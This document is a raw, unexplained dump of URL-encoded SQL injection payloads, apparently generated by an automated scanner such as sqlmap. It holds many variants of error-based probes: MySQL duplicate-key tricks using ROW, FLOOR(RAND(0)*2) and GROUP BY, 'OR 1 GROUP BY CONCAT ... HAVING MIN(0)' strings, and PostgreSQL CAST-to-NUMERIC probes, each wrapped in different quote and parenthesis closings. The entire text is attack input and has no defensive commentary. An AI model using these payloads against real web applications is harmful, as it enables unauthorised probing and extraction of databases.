-7556%25%27%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 -3927%25%27%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 -6880%25%27%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 -6234%25%27%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 -8166%00%27%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%27WkMt%27%3D%27WkMt -5450%00%27%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%27FBnL%27%3D%27FBnL -2491%27%29%20WHERE%208605%3D8605%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -3551%22%29%20WHERE%203717%3D3717%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -2249%27%20WHERE%201930%3D1930%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -8103%22%20WHERE%204215%3D4215%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -3080%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3822%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9535%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8060%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3793%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1009%29%20WHERE%203106%3D3106%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5717%20WHERE%202710%3D2710%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9279%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6003%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7467%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5664%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1559%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9879%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8073%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3560%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7810%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9233%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3565%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8152%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6229%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4909%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2412%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5764%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8804%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5783%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1843%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9203%25%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5052%25%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5559%25%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3236%25%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4482%00%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2541%00%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6617%27%29%20WHERE%208264%3D8264%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5311%22%29%20WHERE%209091%3D9091%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4517%27%20WHERE%209483%3D9483%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6712%22%20WHERE%202358%3D2358%20OR%201%20GROUP%20BY%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3758%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -2978%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%285993%3D5993 -9326%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%286863%3D6863 -2923%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%283132%3D3132 -7770%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -4901%29%20WHERE%202002%3D2002%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -4323%20WHERE%205638%3D5638%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -6357%27%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -7858%27%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -3396%22%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -5617%27%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27ZiTT%27%3D%27ZiTT -9523%27%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27RsZk%27%3D%27RsZk -9405%27%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27kOfk%27%3D%27kOfk -9030%27%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27qRxg%27%3D%27qRxg -4526%27%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27bwqT%27%20LIKE%20%27bwqT -7673%27%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27echh%27%20LIKE%20%27echh -9076%27%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27zDDw%27%20LIKE%20%27zDDw -7357%27%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27Nusu%27%20LIKE%20%27Nusu -1991%22%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22KLDc%22%3D%22KLDc -9247%22%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22lMCh%22%3D%22lMCh -6351%22%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22EvgZ%22%3D%22EvgZ -9960%22%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22YKVm%22%3D%22YKVm -3354%22%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22euli%22%20LIKE%20%22euli -9601%22%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22Ycal%22%20LIKE%20%22Ycal -7233%22%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22jlYJ%22%20LIKE%20%22jlYJ 